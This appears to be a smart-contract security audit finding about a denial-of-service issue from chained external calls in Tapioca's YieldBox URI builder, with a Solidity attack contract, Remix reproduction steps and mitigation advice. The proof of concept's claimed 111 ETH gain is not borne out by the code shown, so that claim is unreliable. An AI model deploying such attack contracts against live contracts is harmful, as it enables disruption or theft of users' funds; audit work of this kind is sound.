Detailed description of the impact of this finding.
This call is executed following another call within the same transaction. It is possible that the call never gets executed if a prior call fails permanently. This might be caused intentionally by a malicious callee.
Proof of Concept
Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.
NB: Using Remix Dev Foundry deployment.
1. Switch to the first account (as Alice) and deploy the victim contract.
2. Switch to the second account (as Eve) and deploy the attack contract.
3. Switch to the first account (as Alice), select 111 ETH, enter the address and string values, and click the symbol() button.
4. Switch to the second account (as Eve), select 111 ETH, paste Alice's victim contract address into the input box next to the attack() button, and then click the attack() button.
5. In account 2 (Eve), click the getBalance button; the balance is +111 ETH.
PoC
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

import "/2023-07-tapioca/tap-token-audit/node_modules/@openzeppelin/contracts/utils/Strings.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/Base64.sol";
import "/2023-07-tapioca/tap-token-audit/node_modules/@boringcrypto/boring-solidity/contracts/libraries/BoringERC20.sol";
import "./interfaces/IYieldBox.sol";
import "./NativeTokenFactory.sol";
import "./YieldBoxURIBuilder.sol";
import "/2023-07-tapioca/YieldBox/contracts/enums/YieldBoxTokenType.sol";
import "/2023-07-tapioca/YieldBox/contracts/interfaces/IStrategy.sol";

// PoC contract deployed from the second account (eve).
contract AttackYieldBoxURIBuilder is YieldBoxURIBuilder {
    // Victim contract deployed from the first account (alice).
    YieldBoxURIBuilder public yieldboxuribuilder;

    constructor(YieldBoxURIBuilder _yieldboxuribuilder) {
        yieldboxuribuilder = YieldBoxURIBuilder(_yieldboxuribuilder);
    }

    // Calls symbol() on the victim with an Asset whose contract address and
    // strategy both point back at the victim, token id 111, native symbol "ETH".
    function attack() public payable {
        yieldboxuribuilder.symbol(Asset(TokenType(1), address(yieldboxuribuilder), IStrategy(address(yieldboxuribuilder)), 111), "ETH");
    }

    // Returns the ETH balance held by this contract.
    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
Tools Used
MythX
Visual Studio Code
Foundry
Remix IDE
Recommended Mitigation Steps
If possible, refactor the code such that each transaction only executes one external call or make sure that all callees can be trusted (i.e. they're part of your own codebase).
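Where several external calls in one transaction cannot be avoided and the callees are untrusted, each call can be isolated so that a failing callee does not block the calls after it. The sketch below is an added example, not code from this report or from the YieldBox repository, and goes beyond the two options named above; `IMetadata`, `MetadataReader`, `GAS_CAP` and the `"???"` fallback are hypothetical names and values chosen for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.9;

// Hypothetical interface for an untrusted callee (assumption, not from the report).
interface IMetadata {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
}

contract MetadataReader {
    // Assumed per-call gas budget, so one callee cannot burn all forwarded gas.
    uint256 private constant GAS_CAP = 50_000;

    // Pattern flagged by the finding: two external calls in sequence.
    // If name() reverts, symbol() is never reached and the whole call fails.
    function describeUnsafe(IMetadata token)
        external view returns (string memory, string memory)
    {
        return (token.name(), token.symbol());
    }

    // Each call is isolated: a revert or gas exhaustion in one callee
    // produces a fallback value instead of aborting the other call.
    function describeSafe(IMetadata token)
        external view returns (string memory n, string memory s)
    {
        // try/catch does not cover a target without code, so check first.
        if (address(token).code.length == 0) {
            return ("???", "???");
        }
        try token.name{gas: GAS_CAP}() returns (string memory v) {
            n = v;
        } catch {
            n = "???";
        }
        try token.symbol{gas: GAS_CAP}() returns (string memory v) {
            s = v;
        } catch {
            s = "???";
        }
    }
}
```

Return data that fails ABI decoding still reverts in the caller and is not caught by `catch`, so a fully defensive reader would use a low-level `staticcall` and validate the returned bytes itself.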
Lines of code
https://github.com/Tapioca-DAO/YieldBox/blob/f5ad271b2dcab8b643b7cf622c2d6a128e109999/contracts/YieldBoxURIBuilder.sol#L59
Vulnerability details
Assessed type
DoS